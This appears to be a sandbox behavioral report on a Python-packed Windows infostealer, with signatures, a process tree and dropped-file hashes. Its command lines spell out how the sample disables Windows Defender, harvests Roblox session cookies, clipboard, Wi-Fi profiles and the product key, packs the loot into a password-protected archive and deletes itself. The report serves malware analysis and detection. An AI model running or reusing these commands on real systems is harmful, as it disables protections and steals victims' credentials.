Analysis
max time kernel: 140s
max time network: 109s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-06-2024 08:27
Behavioral task: behavioral1
Sample: 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
Resource: win7-20240508-en
General
Target: 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
Size: 5.9MB
MD5: 82783812e82bd062967d473332b45f93
SHA1: c7f991ed9a50a837e19c26fa3ef45ad24228495b
SHA256: 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a
SHA512: 459b03f4f0342422144c08e81a9ee3c6940b4c894b7b5c7f42e37bd9fae81ba1015999574ab3a554a81466e7569d3e81aee11afc1d8f9bfcb9d3c5d6ee7d9c94
SSDEEP: 98304:0rTzvMhjdOUei65sn6Wfz7pnxCMJk1JTxuZ3zEgyOFRyn26iI2kr2b4pnjZpbR:0rTY0DOYMJeJT44xn26T2CHnNVR
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes (pid, process):
- 456 powershell.exe
- 532 powershell.exe
- 3312 powershell.exe
Drops file in Drivers directory (3 IoCs)
Processes (description, ioc, process):
- File opened for modification, C:\Windows\System32\drivers\etc\hosts, 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
- File opened for modification, C:\Windows\System32\drivers\etc\hosts, attrib.exe
- File opened for modification, C:\Windows\System32\drivers\etc\hosts, attrib.exe
Executes dropped EXE (1 IoC)
Processes (pid, process):
- 1700 rar.exe
Loads dropped DLL (17 IoCs)
Processes (pid, process):
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe (listed 17 times, one entry per IoC)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Resources matching yara rule upx (resource, yara_rule):
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\python310.dll
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\_ctypes.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\libffi-7.dll
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\_ssl.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\_sqlite3.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\_socket.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\_queue.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\_lzma.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\_hashlib.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\_decimal.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\_bz2.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\unicodedata.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\sqlite3.dll
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\select.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\libssl-1_1.dll
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\libcrypto-1_1.dll
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Network flows (flow, ioc):
- 9 ip-api.com
- 32 ip-api.com
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Detects videocard installed (1 TTP, 3 IoCs)
Uses WMIC.exe to determine videocard installed.
Processes (pid, process):
- 3968 WMIC.exe
- 3444 WMIC.exe
- 812 WMIC.exe
Enumerates processes with tasklist (1 TTP, 5 IoCs)
Processes (pid, process):
- 452 tasklist.exe
- 1996 tasklist.exe
- 3860 tasklist.exe
- 3636 tasklist.exe
- 4904 tasklist.exe
Gathers system information (1 TTP, 1 IoC)
Runs systeminfo.exe.
Runs ping.exe (1 TTP, 1 IoC)
Suspicious behavior: EnumeratesProcesses (26 IoCs)
Processes (pid, process, number of entries recorded):
- 4004 powershell.exe (3)
- 456 powershell.exe (3)
- 532 powershell.exe (3)
- 4932 powershell.exe (3)
- 3312 powershell.exe (3)
- 2000 powershell.exe (2)
- 1604 powershell.exe (3)
- 784 powershell.exe (3)
- 3516 powershell.exe (3)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (pid, process: token privileges adjusted):
- 2896 WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this set is recorded twice for PID 2896)
- 452 tasklist.exe: SeDebugPrivilege
- 4004 powershell.exe: SeDebugPrivilege
- 456 powershell.exe: SeDebugPrivilege
- 3968 WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34 (the report stops here at 64 entries)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (pid, process -> target pid, target process; each write is recorded twice in the report):
- 884 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 5060 cmd.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 3696 cmd.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 4756 cmd.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 2752 cmd.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 1836 cmd.exe
- 2752 cmd.exe -> 452 tasklist.exe
- 3696 cmd.exe -> 4004 powershell.exe
- 1836 cmd.exe -> 2896 WMIC.exe
- 5060 cmd.exe -> 456 powershell.exe
- 4756 cmd.exe -> 4400 mshta.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 1016 cmd.exe
- 1016 cmd.exe -> 4484 reg.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 1660 cmd.exe
- 1660 cmd.exe -> 4268 reg.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 4356 netsh.exe
- 4356 cmd.exe -> 3968 WMIC.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 4992 cmd.exe
- 4992 cmd.exe -> 3444 WMIC.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 1764 cmd.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 2924 cmd.exe
- 1764 cmd.exe -> 4244 attrib.exe
- 2924 cmd.exe -> 532 powershell.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 3260 cmd.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 1220 cmd.exe
- 1220 cmd.exe -> 1996 tasklist.exe
- 3260 cmd.exe -> 3860 tasklist.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 4352 cmd.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 4640 cmd.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 1568 cmd.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 2936 cmd.exe
- 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -> 2276 cmd.exe
Views/modifies file attributes (1 TTP, 3 IoCs)
Processes (pid, process):
- 4244 attrib.exe
- 2176 attrib.exe
- 5044 attrib.exe
Processes
Process tree (indented by depth; each entry gives the image path, the command line and the signatures it triggered):
PID 884  C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"
  - Suspicious use of WriteProcessMemory
  PID 540  C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"
    - Drops file in Drivers directory
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID 5060  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe'"
      - Suspicious use of WriteProcessMemory
      PID 456  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    PID 3696  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      - Suspicious use of WriteProcessMemory
      PID 4004  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    PID 4756  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('enter the key', 0, 'key ', 32+16);close()""
      - Suspicious use of WriteProcessMemory
      PID 4400  C:\Windows\system32\mshta.exe
        cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('enter the key', 0, 'key ', 32+16);close()"
    PID 2752  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      - Suspicious use of WriteProcessMemory
      PID 452  C:\Windows\system32\tasklist.exe
        cmdline: tasklist /FO LIST
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    PID 1836  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      - Suspicious use of WriteProcessMemory
      PID 2896  C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic csproduct get uuid
        - Suspicious use of AdjustPrivilegeToken
    PID 1016  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      - Suspicious use of WriteProcessMemory
      PID 4484  C:\Windows\system32\reg.exe
        cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
    PID 1660  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      - Suspicious use of WriteProcessMemory
      PID 4268  C:\Windows\system32\reg.exe
        cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
    PID 4356  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      - Suspicious use of WriteProcessMemory
      PID 3968  C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic path win32_VideoController get name
        - Detects videocard installed
        - Suspicious use of AdjustPrivilegeToken
    PID 4992  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      - Suspicious use of WriteProcessMemory
      PID 3444  C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic path win32_VideoController get name
        - Detects videocard installed
    PID 1764  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe""
      - Suspicious use of WriteProcessMemory
      PID 4244  C:\Windows\system32\attrib.exe
        cmdline: attrib +h +s "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"
        - Views/modifies file attributes
    PID 2924  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
      - Suspicious use of WriteProcessMemory
      PID 532  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
    PID 3260  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      - Suspicious use of WriteProcessMemory
      PID 3860  C:\Windows\system32\tasklist.exe
        cmdline: tasklist /FO LIST
        - Enumerates processes with tasklist
    PID 1220  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      - Suspicious use of WriteProcessMemory
      PID 1996  C:\Windows\system32\tasklist.exe
        cmdline: tasklist /FO LIST
        - Enumerates processes with tasklist
    PID 4352  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      PID 4516  C:\Windows\System32\Wbem\WMIC.exe
        cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
    PID 2936  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      PID 4932  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Get-Clipboard
        - Suspicious behavior: EnumeratesProcesses
    PID 4640  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      PID 3636  C:\Windows\system32\tasklist.exe
        cmdline: tasklist /FO LIST
        - Enumerates processes with tasklist
    PID 1568  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID 4616  C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 2276  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      PID 4356  C:\Windows\system32\netsh.exe
        cmdline: netsh wlan show profile
    PID 2192  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "systeminfo"
      PID 876  C:\Windows\system32\systeminfo.exe
        cmdline: systeminfo
        - Gathers system information
    PID 888  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      PID 2652  C:\Windows\system32\reg.exe
        cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
    PID 5028  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
      PID 3312  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        PID 4968  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d5w4if3b\d5w4if3b.cmdline"
          PID 1528  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES56F9.tmp" "c:\Users\Admin\AppData\Local\Temp\d5w4if3b\CSC86CCA3C9AAB940A2BABEDC64879E02F.TMP"
    PID 3932  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID 3664  C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 3732  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      PID 2176  C:\Windows\system32\attrib.exe
        cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts
        - Drops file in Drivers directory
        - Views/modifies file attributes
    PID 3048  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      PID 5044  C:\Windows\system32\attrib.exe
        cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts
        - Drops file in Drivers directory
        - Views/modifies file attributes
    PID 3620  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID 3736  C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 3464  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      PID 2652  C:\Windows\System32\Conhost.exe
        cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID 4904  C:\Windows\system32\tasklist.exe
        cmdline: tasklist /FO LIST
        - Enumerates processes with tasklist
    PID 4928  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID 4648  C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 2128  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID 4036  C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 1304  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID 412  C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 1016  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      PID 2000  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious behavior: EnumeratesProcesses
    PID 4348  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      PID 1604  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious behavior: EnumeratesProcesses
    PID 532  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "getmac"
      PID 2324  C:\Windows\system32\getmac.exe
        cmdline: getmac
    PID 4960  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI8842\rar.exe a -r -hp"blackexe" "C:\Users\Admin\AppData\Local\Temp\R9g0r.zip" *"
      PID 1700  C:\Users\Admin\AppData\Local\Temp\_MEI8842\rar.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\_MEI8842\rar.exe a -r -hp"blackexe" "C:\Users\Admin\AppData\Local\Temp\R9g0r.zip" *
        - Executes dropped EXE
    PID 4640  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      PID 3380  C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic os get Caption
    PID 2936  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      PID 5044  C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic computersystem get totalphysicalmemory
    PID 3204  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      PID 4804  C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic csproduct get uuid
    PID 1252  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      PID 784  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        - Suspicious behavior: EnumeratesProcesses
    PID 1544  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      PID 812  C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic path win32_VideoController get name
        - Detects videocard installed
    PID 4968  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      PID 1528  C:\Windows\System32\Conhost.exe
        cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID 3516  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        - Suspicious behavior: EnumeratesProcesses
    PID 3720  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe""
      PID 2188  C:\Windows\system32\PING.EXE
        cmdline: ping localhost -n 3
        - Runs ping.exe
Network
MITRE ATT&CK Enterprise v15
Downloads
Dropped or written files (path, size):
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (2KB)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (1KB)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (1KB)
- C:\Users\Admin\AppData\Local\Temp\RES56F9.tmp (1KB)
- C:\Users\Admin\AppData\Local\Temp\_MEI8842\VCRUNTIME140.dll (94KB)
SHA1879098b8a353a39e16c79e6479195d43ce98629e
SHA256ded5adaa94341e6c62aea03845762591666381dca30eb7c17261dd154121b83e
SHA512e112f267ae4c9a592d0dd2a19b50187eb13e25f23ded74c2e6ccde458bcdaee99f4e3e0a00baf0e3362167ae7b7fe4f96ecbcd265cc584c1c3a4d1ac316e92f0
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_bz2.pydFilesize
43KB
MD552e9fde32cb021eb3fc4c5f4138eeacc
SHA133887c44fa0f729120effb64fb39baad3c36e22a
SHA2567fdfb1e06602983d58a70ab37697dd57e343cfc5b0a0f66a5b3cdc3bffd4a691
SHA512bcd2c895da624951f6606dbfb27d27941436363e1d05eee498bb94189cadc24d2e3fd5636569129388e06f5cf9be0aa4d8965aff6190338bb06b9572ab8cbee6
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_ctypes.pydFilesize
54KB
MD5e1abde07979f598e3f280c59ed50a44b
SHA19169944889a0da8f30cff5242e03418a0a060246
SHA2565eb68a6cb85bc535faa009d984e2b7f99f150c9a7e754deff9321a98e380000b
SHA512ca0635d91f4568a6684e92101d7c875f49d2592597acaf2696fcba16b776b3a2431382b01de2473567c2c6640a96090d289c2c82a10bea44ed8ee0b912cddab4
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_decimal.pydFilesize
101KB
MD51a2a0e2af5fde9e85636e43e4a73471a
SHA1f708ce0b3616ab3b29f66ce4800e20c2ec730048
SHA2567957053a3abe0e2b2239f8df59917343b10c14bb46d33f366ce660380c08c5d3
SHA512159c093bc947565eaf08cc2b7d3d1d1b9fdb6f6b5fa42413372bed5bd045c18acca0c5774d2ca7e4fdf4180a77ec52fb90f869209fad00cdabe05024c6f22c02
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_hashlib.pydFilesize
31KB
MD58bc6f365d6db7b8da29e56230f5be575
SHA1a8a52c11707123ef65028ef4d3d629ef8bc623bc
SHA256cf717e5f8d83fc1aa3c417f814a77ee0ec83c5dc010a1a39131cb22532e50aee
SHA5129fe14343b39f58f70fd1f44fe603276b878f40b74fc1f8891fcd3693be017f8393a1f34375cc399204b10a2551664b7a7b244688b56ab98b96688d6baa9962e7
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_lzma.pydFilesize
81KB
MD50b4682f21e0cbd58b229c3bf4c87e58e
SHA1644aafb1511c580819bfc2e4840f9a879590b3ef
SHA256260c9c9a7b8f0cf7f391d1bca5c9e3eed1d275a2b2a7056c8ef22fea4682e0ab
SHA51287a1c3a44dd3889ebfc1704b3d9c6a1def067ca113edc57101e9df5bf50a4951aad295eebed75ecd3afd2bc448219373a3d757b22dcf7a00f66150b162a8ec6d
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_queue.pydFilesize
21KB
MD55ddf5bc6b73fead41d4df46cc80e5ca5
SHA1dd856ad90cb93f4764c28f8a9c889e16a65c546a
SHA2565ca402d9461cb58adc9a5610c906d7c53eb154dce2b9ad3680ed5ad86d2a6d35
SHA512ac15ce29cc072f4f8031786f750ef86bdbc044f5d89df57979cf97efc6c021cb86a86a98b5939f56e9d6f71f7d6862d5b9af0d6a0a6a404d042ba0ce061c5fa1
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_socket.pydFilesize
38KB
MD565003f3d63e947ec96c9a2c519a93f1d
SHA11ee3c9fd90eb3e1415d0ac798175e46dba684c80
SHA256754e05d4bdd623096826e21f1212cf82f5bcfeff5aeb9fadec94afd36f304de3
SHA51294003881ea7734e8d349c08c2320299bddb49e954f808e032903c34ab7031ba479c940625a90475f826f2c3c67e8b106b647b20bd5a6f0ce03003b1d26cc4a90
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_sqlite3.pydFilesize
45KB
MD51e87bcfbf181171e2a364a8ab029a0e3
SHA1c7c70521d6f265d78815a652d521c8286b39fb0c
SHA25638874a6e05327d61bd6b76094a4596c4382018cab93c95beecfc8ced62b814dd
